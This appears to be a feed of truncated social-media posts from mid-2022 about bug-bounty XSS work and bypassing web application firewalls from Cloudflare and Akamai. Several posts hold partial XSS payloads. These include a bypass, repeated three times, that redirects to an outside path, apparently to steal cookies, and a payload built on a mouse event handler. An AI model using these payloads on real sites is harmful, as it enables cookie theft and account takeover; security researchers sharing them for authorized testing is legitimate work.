#HIP22 Gil Cohen talk about a new hacking technique named Frontend server #hijacking or Frontjacking. It could be leveraged by chaining multiple weakn ...July 1, 2022
XSS Vulnerability Scenarios (challenges)
This repository is a Dockerized php application containing some XSS vulnerability challenges.
The ideas behi ...June 21, 2022
Was exploiting XSS
Tried everything, but was getting blocked by the WAF.
Tried CRLF and bypassed the WAF.
Xss bypass using CRLF 🤔
#bugbounty #info ...June 15, 2022
New Bug Bounty Tool!
TTWAF, or Test This WAF, is a Web Application Firewall (WAF) bypass testing tool. You can test a list of payloads like XSS, LFI, ...June 15, 2022
#XSS is about to control user actions. The cited tweet + https://t.co/8itR4RuXwn helped me to have #XSS done
Payload: '"><p only=1337 onmouseen ...June 10, 2022
New Cloudflare WAF Bypass to Fetch Cookie and Escalating XSS to Account Takeover.
As if you use document.location=URI (Blocked)
but using location=`UR ...June 4, 2022
Does anyone know a bypass for the `</script>` in the urlencoded request body for cloudflare #waf ? It's a post based xss, so it should be possib ...May 31, 2022
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...May 29, 2022
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...May 27, 2022
Akamai XSS WAF bypass. Working in all browsers.
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stea ...May 25, 2022
Top story: Bug Bounty Redacted #3: Hacking APIs & XSS, SQLi, WAF Bypass in a regional web application https://t.co/z3bSG2t3jg, see more https://t. ...May 18, 2022
Watch our third episode of Bug Bounty Redacted to learn about hacking APIs and finding XSS, SQLi, WAF Bypass in a regional web application. https://t. ...May 18, 2022
If you came across websites use dotcms make sure to check those 2 bugs
1 : rxss
https://t.co/1ySlM5SrjE
Thanks @brutelogic for bypass waf );
2: broken ...May 13, 2022
I don't understand how knowing the origin ip can help you exploit that reflected xss. A better example would have been a server side vulnerability.
A ...May 9, 2022